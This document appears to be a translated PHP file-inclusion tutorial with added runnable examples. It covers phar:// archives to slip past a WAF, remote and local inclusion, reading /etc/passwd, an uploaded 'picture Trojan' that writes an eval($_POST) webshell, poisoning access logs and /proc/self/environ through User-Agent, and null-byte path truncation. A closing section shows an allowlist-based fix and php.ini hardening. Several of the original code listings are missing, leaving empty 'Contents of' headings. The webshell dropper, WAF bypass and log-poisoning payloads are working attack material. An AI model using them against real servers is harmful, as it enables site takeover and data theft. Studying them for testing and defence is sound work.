File inclusion is a vulnerability class used during penetration tests, mainly to get a webshell (Trojan) file past a WAF. While browsing the Tools forum today I found a new file-inclusion trick, which I share here together with the basic ways of exploiting file inclusion vulnerabilities.
Including the payload through the phar:// stream wrapper can help bypass some WAF detection during an engagement: the PHP code sits inside an archive, and the archive can carry any extension. The phar:// wrapper has been available since PHP 5.3.0, and it appears to get past Safedog. Unlike http:// or data:, phar:// is a local stream, so include works with allow_url_include=Off; only the phar extension (enabled by default) is required.
Contents of the new shell.php:
Contents of the new test.txt:
Compress test.txt into a zip archive. The archive can be renamed to .zip, .phar, .rar, .jpg or any other extension, because the phar wrapper identifies the format (phar, tar or zip) by the file's contents, not by its name. After requesting shell.php, the phpinfo output appears.
In the lab environment, create shell.php and test.txt in the test directory, and package test.txt into test.zip.
Contents of shell.php:
Contents of test.txt:
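The phar:// trick from the two passages above, as an added example that is not code from the original post. It builds test.zip from test.txt with ZipArchive (the page used an external compressor), copies the archive to test.jpg to show that the extension is irrelevant, and then does what shell.php does: include a member of the archive through phar://. The directory under the system temp path and the marker string printed by test.txt are my own choices; the script assumes the zip and phar extensions are loaded.

```php
<?php
// Added example, not from the original article.
// Requires ext-zip (to build the archive) and ext-phar (default-enabled).
$dir = sys_get_temp_dir() . '/phar-demo';
@mkdir($dir);
chdir($dir);

// test.txt carries the PHP payload; here a harmless marker instead of phpinfo().
file_put_contents('test.txt', '<?php echo "included via phar://, PHP ", PHP_VERSION, "\n";');

// Package test.txt into test.zip (what the article does with a zip tool).
$zip = new ZipArchive();
if ($zip->open('test.zip', ZipArchive::CREATE | ZipArchive::OVERWRITE) !== true) {
    die("cannot create test.zip\n");
}
$zip->addFile('test.txt');
$zip->close();

// Rename does not matter: the phar wrapper detects phar/tar/zip by content.
copy('test.zip', 'test.jpg');

// This is shell.php's job: include one member of the archive.
// phar:// is a local stream, so allow_url_include=Off does not block it,
// and phar.readonly=On only restricts *writing* archives, not reading them.
include 'phar://' . $dir . '/test.zip/test.txt';
include 'phar://' . $dir . '/test.jpg/test.txt';
```

Both include lines print the marker. A WAF that keys on the uploaded file's extension or on a ".php" in the include parameter sees only test.jpg and a phar:// path.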
PHP's file inclusion functions (include, include_once, require, require_once) are divided into local inclusion and remote inclusion; when the path they receive comes from user input, a file inclusion vulnerability arises, as follows:
Create a new phpinfo.txt, then create shell.php containing:
Requesting shell.php outputs the phpinfo page. Whatever the extension is changed to, the file is executed as PHP code. If the file is not valid PHP (i.e. contains no <?php ... ?> tags), include simply outputs its source verbatim.
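The two behaviours described above (PHP tags are executed regardless of extension; a file without tags is echoed verbatim), as an added example rather than the article's own listing. It goes slightly beyond the text by also including a .jpg. The temp directory, file names and marker strings are constructed for the demo.

```php
<?php
// Added example, not from the original article.
$dir = sys_get_temp_dir() . '/inc-demo';
@mkdir($dir);

// Three constructed files: PHP code under .txt, PHP code under .jpg, and plain text.
file_put_contents("$dir/phpinfo.txt", '<?php echo "executed from .txt\n"; ?>');
file_put_contents("$dir/cat.jpg",     '<?php echo "executed from .jpg\n"; ?>');
file_put_contents("$dir/notes.txt",   "no php tags here, so this line is printed as-is\n");

// Include a file and return whatever it printed.
function include_output(string $path): string
{
    ob_start();
    include $path;          // include ignores the extension entirely
    return ob_get_clean();
}

foreach (['phpinfo.txt', 'cat.jpg', 'notes.txt'] as $name) {
    echo "$name => ", include_output("$dir/$name");
}
```

The first two files run as code; notes.txt, which has no PHP open tag, is dumped unchanged. This is why an LFI is also a source-disclosure bug: including a config file that happens to lack PHP tags, or any non-PHP file, leaks its contents.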
Prerequisite for remote inclusion: allow_url_include must be On (it is Off by default). allow_url_fopen, which is On by default, must also be On.
Create a new php.txt:
Create a new index.php:
Visiting http://www.xxxx.com/index.php?page=http://www.xxxx.com/php.txt outputs hello world.
Local inclusion works the same way with a local path, for example: http://www.xxx.com/index.php?page=/etc/passwd
Save test.txt on the remote (attacker-controlled) server with the following content:
If the target site has a remote inclusion vulnerability, visiting http://www.xxx1.com/index.php?page=http://www.xx2.com/test.txt creates a shell.php in the web root with the following content:
If allow_url_include is off on the target server, try local inclusion plus file upload instead.
Upload a picture Trojan a.jpg with the content:
Visiting http://www.xxx.com/index.php?page=./a.jpg generates shell.php locally.
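The dropper chain from the remote-inclusion passage (test.txt) and the upload passage (a.jpg) is the same mechanism: the included file is executed and writes shell.php next to index.php. Here it is as an added example on a single machine, not the article's own code. index.php is the vulnerable include, a.jpg is the uploaded "image", and the request is simulated by setting $_GET. The temp directory, the cmd parameter name and the shell body are my own.

```php
<?php
// Added example, not from the original article. Runs entirely in a temp dir.
$root = sys_get_temp_dir() . '/lfi-demo';
@mkdir($root);
chdir($root);

// The vulnerable pattern: user input flows straight into include.
file_put_contents("$root/index.php", <<<'PHP'
<?php include $_GET['page']; ?>
PHP);

// The uploaded "picture": any PHP inside is executed once it is included.
// When run it drops a one-line webshell beside index.php (same idea as the
// remote test.txt in the RFI case, just delivered by upload instead of URL).
file_put_contents("$root/a.jpg", <<<'PHP'
<?php file_put_contents(__DIR__ . '/shell.php', '<?php @eval($_POST["cmd"]); ?>'); ?>
PHP);

// Simulate http://www.xxx.com/index.php?page=./a.jpg
// (assumes the upload landed next to index.php; adjust the path otherwise).
$_GET['page'] = './a.jpg';
include "$root/index.php";

// Verify the side effect the article describes.
printf("shell.php exists: %s\n", file_exists("$root/shell.php") ? 'yes' : 'no');
echo file_get_contents("$root/shell.php"), "\n";
```

The request itself returns nothing interesting; the effect is the new file on disk, which is what makes this chain hard to spot from the response alone.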
Apache keeps two logs, access.log and error.log. Every request is recorded in access.log; a request for a page that does not exist is additionally recorded in error.log. So a request such as http://www.xxx.com/<?php eval($_POST[...]);?> writes the one-line shell into access.log. In practice, however, the browser URL-encodes the payload before it reaches the log (the < and > become %3C and %3E, which PHP does not treat as tags), so the request has to be sent raw through an intercepting proxy, typically in a header such as User-Agent rather than in the URL. You also need to know the path of access.log in order to include it; without the path the attack does not work.
For example: http://www.test.com/view.php?page=../../../../proc/self/environ
/proc/self/environ holds the environment variables of the running web process, and some of them are user-controllable. The most common technique is to put a one-line shell in the User-Agent header. Note that this only applies when PHP runs under CGI or a similar model that copies request headers into the process environment; with mod_php the environ file belongs to the Apache process and contains no request headers, and on many systems it is not readable by the web user at all.
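Why encoding matters for log poisoning, as an added example that is not part of the article. Two Apache access.log lines are constructed: one where the payload was sent in the URL from a browser (and therefore arrived percent-encoded), and one where the same payload was placed raw in User-Agent via a proxy. Including the file the way a vulnerable include $_GET['page'] would shows that only the raw line executes. The log path, IPs, timestamps and payload are all made up for the demo.

```php
<?php
// Added example, not from the original article.
$log = sys_get_temp_dir() . '/access.log';   // stands in for /var/log/apache2/access.log

// Constructed log line 1: payload in the URL. The browser percent-encoded it,
// so the log holds "%3C?php" ... not a real PHP open tag.
$encoded = '10.0.0.1 - - [01/Jan/2016:00:00:00 +0000] '
         . '"GET /%3C?php%20echo%201%2B1;?%3E HTTP/1.1" 404 209 "-" "Mozilla/5.0"';

// Constructed log line 2: same payload sent raw in User-Agent through a proxy.
$raw = '10.0.0.1 - - [01/Jan/2016:00:00:01 +0000] '
     . '"GET / HTTP/1.1" 200 612 "-" "<?php echo 1+1; ?>"';

file_put_contents($log, $encoded . "\n" . $raw . "\n");

// What the vulnerable include does with the log file.
ob_start();
include $log;
$out = ob_get_clean();
echo $out;

// Line 1 is printed back verbatim (still contains %3C?php);
// line 2 had its <?php ... ?> replaced by the output "2".
printf("encoded payload still literal: %s\n", strpos($out, '%3C?php') !== false ? 'yes' : 'no');
printf("raw payload executed: %s\n", strpos($out, '"2"') !== false ? 'yes' : 'no');
```

The same rule applies to /proc/self/environ: the value has to reach the process environment with literal <?php tags, which is why User-Agent (copied as-is by the server) is the usual carrier.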
- data: (the data:// wrapper): available from PHP 5.2.0; including it requires allow_url_include=On
- php://input: also requires allow_url_include=On
Some developers write code like the following to prevent local inclusion, appending a fixed .php suffix to the requested name:
(a) %00 (null byte) truncation
In this case, after uploading 1.jpg containing PHP code, requesting it with 1.jpg as the parameter (e.g. http://www.xxx.com/1.jpg) actually tries to include 1.jpg.php, which does not exist, so an error is reported. Here you can try http://www.xxx.com/1.jpg%00: the null byte terminates the C string, so the appended suffix is dropped and 1.jpg is included. This only works on PHP before 5.3.4 with magic_quotes_gpc off; later versions reject paths that contain a null byte.
(b) Long directory truncation
On Windows the maximum path length is about 256 bytes (MAX_PATH is 260), on Linux 4096 bytes (PATH_MAX). Older PHP versions silently discarded the excess, so padding the path with enough "/." or "/" segments pushed the appended suffix past the limit. Like %00 truncation, this was fixed in later PHP releases and does not work on current versions.
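The suffix-append mitigation and the %00 attempt against it, as an added example rather than the article's own listing. It writes a 1.jpg containing PHP, includes "1.jpg" and "1.jpg\0" through the suffixed include, and converts PHP's warning or ValueError into a printed rejection so the result is visible on a current interpreter. The temp directory and file name are my own; the point is that on PHP 5.3.4 and later the null byte is refused rather than truncating the path.

```php
<?php
// Added example, not from the original article.
$dir = sys_get_temp_dir() . '/suffix-demo';
@mkdir($dir);
file_put_contents("$dir/1.jpg", '<?php echo "1.jpg executed\n"; ?>');

// The developer's "fix": force a .php suffix so only .php files are includable.
// Returns what the include printed, or a "rejected:" line with PHP's reason.
function include_with_suffix(string $dir, string $name): string
{
    // Turn warnings into exceptions so a failed include is reported uniformly
    // whether PHP emits E_WARNING (7.x) or throws (8.x).
    set_error_handler(function (int $no, string $msg): bool {
        throw new ErrorException($msg, 0, $no);
    });
    try {
        ob_start();
        include $dir . '/' . $name . '.php';
        return ob_get_clean();
    } catch (Throwable $e) {
        ob_end_clean();
        return 'rejected: ' . $e->getMessage() . "\n";
    } finally {
        restore_error_handler();
    }
}

// ?file=1.jpg   -> looks for 1.jpg.php, which does not exist
echo include_with_suffix($dir, '1.jpg');

// ?file=1.jpg%00 -> PHP < 5.3.4 (magic_quotes_gpc=Off) stopped at the NUL and
// included 1.jpg; 5.3.4+ refuses a path containing a null byte, so the bypass is gone.
echo include_with_suffix($dir, "1.jpg\0");
```

Both calls print a "rejected:" line on a current PHP, which is the practical caveat: the truncation tricks in this section are useful against legacy targets only, and the suffix check itself still leaves directory traversal to other .php files open.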
Set open_basedir to a specific directory so that PHP can only open files under that directory.
Set allow_url_include=Off so that remote files cannot be included.
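The vulnerable include beside a hardened one, plus a runtime check of the php.ini settings this section recommends, as an added example that is not the article's code. The hardened version maps a short key to a fixed file through an allowlist and confirms with realpath that the result stays under the base directory, so no user-supplied bytes reach the include path; wrappers such as phar://, data: and php://input are rejected by construction. The page keys and temp directory are illustrative.

```php
<?php
// Added example, not from the original article.

// Vulnerable: the attacker controls the whole path, so ../, phar://, http://,
// data: and php://input are all reachable (subject to php.ini).
function include_vulnerable(string $page): void
{
    include $page;
}

// Hardened: fixed key -> fixed file, nothing else is ever included.
const PAGES = [
    'home'  => 'home.php',
    'about' => 'about.php',
];

function include_safe(string $page, string $base): bool
{
    if (!array_key_exists($page, PAGES)) {
        return false;                       // unknown key: refuse
    }
    $baseReal = realpath($base);
    $real     = realpath($base . '/' . PAGES[$page]);
    // realpath collapses ../ and symlinks; the result must stay inside $base.
    if ($baseReal === false || $real === false
        || strpos($real, $baseReal . DIRECTORY_SEPARATOR) !== 0) {
        return false;
    }
    include $real;
    return true;
}

// Defence in depth from php.ini, as the article recommends:
//   allow_url_include = Off        ; blocks http://, data:, php://input in include
//   open_basedir = /var/www/site   ; blocks /etc/passwd, /proc/self/environ, log files
// Report the live values so a reviewer can see what this interpreter allows.
foreach (['allow_url_include', 'allow_url_fopen', 'open_basedir'] as $key) {
    printf("%-18s = %s\n", $key, var_export(ini_get($key), true));
}

// Demo of the hardened function.
$base = sys_get_temp_dir() . '/safe-inc';
@mkdir($base);
file_put_contents("$base/home.php", '<?php echo "home page\n"; ?>');

var_dump(include_safe('home', $base));                      // true, prints "home page"
var_dump(include_safe('../../etc/passwd', $base));          // false: not an allowlisted key
var_dump(include_safe('phar://test.zip/test.txt', $base));  // false: not an allowlisted key
var_dump(include_safe('about', $base));                     // false: about.php does not exist here
```

The allowlist is the real fix; open_basedir and allow_url_include=Off limit the damage when some other include is missed, but neither stops a phar:// include of a file that sits inside the permitted directory.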
(1) The include directive inserts the source code of "Header.jsp" at translation time, and the
(2) The first two methods can only include resources of the current web application; c:import (JSTL) can also pull in content from outside the container, such as a remote URL.
ASP does not appear to be able to include remote files (IIS security settings); it can only include local files, with the following syntax:
ASPX uses the same include syntax as ASP:
[File upload vulnerability (bypass tricks)](http://thief.one/2016/09/22/%E4%B8%8A%E4%BC%A0%E6%9C%A8%E9%A9%AC%E5%A7%BF%E5%8A%BF%E6%B1%87%E6%80%BB-%E6%AC%A2%E8%BF%8E%E8%A1%A5%E5%85%85/)